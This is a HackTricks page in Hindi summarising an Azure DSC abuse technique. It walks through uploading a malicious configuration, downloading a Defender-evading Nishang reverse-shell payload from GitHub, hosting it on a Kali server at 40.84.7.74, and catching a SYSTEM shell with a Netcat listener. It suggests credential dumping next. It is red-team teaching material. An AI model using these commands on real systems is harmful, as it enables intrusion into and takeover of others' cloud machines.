Az - State Configuration RCE

htARTE (HackTricks AWS Red Team Expert) के साथ जीरो से हीरो तक AWS हैकिंग सीखें!

HackTricks का समर्थन करने के अन्य तरीके:

  • यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो SUBSCRIPTION PLANS की जांच करें!

  • आधिकारिक PEASS & HackTricks swag प्राप्त करें

  • हमारा विशेष NFTs संग्रह, The PEASS Family, खोजें

  • Join the 💬 Discord group या telegram group या हमें Twitter पर फ़ॉलो करें 🐦 @hacktricks_live

  • HackTricks और HackTricks Cloud github repos में PRs सबमिट करके अपने हैकिंग ट्रिक्स साझा करें।

पूरी पोस्ट देखें: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

दूरस्थ सर्वर (C2) इंफ्रास्ट्रक्चर तैयारी और चरणों का सारांश

अवलोकन

इस प्रक्रिया में एक दूरस्थ सर्वर इंफ्रास्ट्रक्चर को सेटअप करने की शामिलता है जो एक संशोधित Nishang Invoke-PowerShellTcp.ps1 पेलोड, जिसे RevPS.ps1 नाम से जाना जाता है, होस्ट करने के लिए डिज़ाइन किया गया है ताकि विंडोज डिफेंडर को छलना कर सके। पेलोड को एक Kali Linux मशीन से IP 40.84.7.74 का उपयोग करके एक सरल Python HTTP सर्वर से प्रदान किया जाता है। ऑपरेशन कई चरणों में निष्पादित किया जाता है:

चरण 1 — फ़ाइलें बनाएं

  • आवश्यक फ़ाइलें: दो PowerShell स्क्रिप्ट की आवश्यकता है:

  1. reverse_shell_config.ps1: एक इच्छित स्थिति कॉन्फ़िगरेशन (DSC) फ़ाइल जो पेलोड को लाती है और निष्पादित करती है। यह GitHub से प्राप्त की जा सकती है।

  2. push_reverse_shell_config.ps1: एक स्क्रिप्ट कॉन्फ़िगरेशन को वीएम पर प्रकाशित करने के लिए, GitHub पर उपलब्ध है।

  • कस्टमाइज़ेशन: इन फ़ाइलों में चरणों और पैरामीटरों को उपयोगकर्ता के विशिष्ट वातावरण के अनुसार अनुकूलित किया जाना चाहिए, संसाधन नाम, फ़ाइल पथ, और सर्वर/पेलोड पहचानकर्ता समाविष्ट करना।

चरण 2 — कॉन्फ़िगरेशन फ़ाइल को ज़िप करें

  • reverse_shell_config.ps1 को .zip फ़ाइल में संकुचित किया जाता है, जिससे यह तैयार हो जाता है अज़्यूर स्टोरेज अकाउंट में स्थानांतरण के लिए।

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

चरण 3 — संग्रह संदर्भ सेट करें और अपलोड करें

  • ज़िप की गई कॉन्फ़िगरेशन फ़ाइल को Azure के Set-AzStorageBlobContent cmdlet का उपयोग करके एक पूर्वनिर्धारित Azure स्टोरेज कंटेनर, azure-pentest में अपलोड किया जाता है।

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

चरण 4 — काली बॉक्स की तैयारी

  • काली सर्वर एक GitHub रिपॉजिटरी से RevPS.ps1 पेलोड डाउनलोड करता है।

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

कदम 5 — कॉन्फ़िगरेशन फ़ाइल प्रकाशित करें

  • कॉन्फ़िगरेशन फ़ाइल को निष्क्रिय किया जाता है, जिससे विंडोज VM पर निर्दिष्ट स्थान पर रिवर्स-शैल स्क्रिप्ट डिप्लॉय होता है।

कदम 6 — पेलोड होस्ट करें और लिस्टनर सेटअप करें

  • एक Python SimpleHTTPServer शुरू किया जाता है ताकि पेलोड होस्ट किया जा सके, साथ ही एक Netcat लिस्टनर भी सेटअप किया जाता है ताकि आने वाली कनेक्शन्स को कैप्चर किया जा सके।

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
  • निर्धारित कार्य द्वारा पेलोड निष्पादित किया जाता है, सिस्टम स्तर की विशेषाधिकार प्राप्त किए जाते हैं।

निष्कर्ष

इस प्रक्रिया के सफल निष्पादन से आगे कई संभावनाएं खुलती हैं, जैसे क्रेडेंशियल डंपिंग या हमले को कई वीएम पर विस्तारित करना। यह मार्गदर्शिका आगे की शिक्षा और रचनात्मकता को प्रोत्साहित करती है आज़्यूर ऑटोमेशन डीएससी में।

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated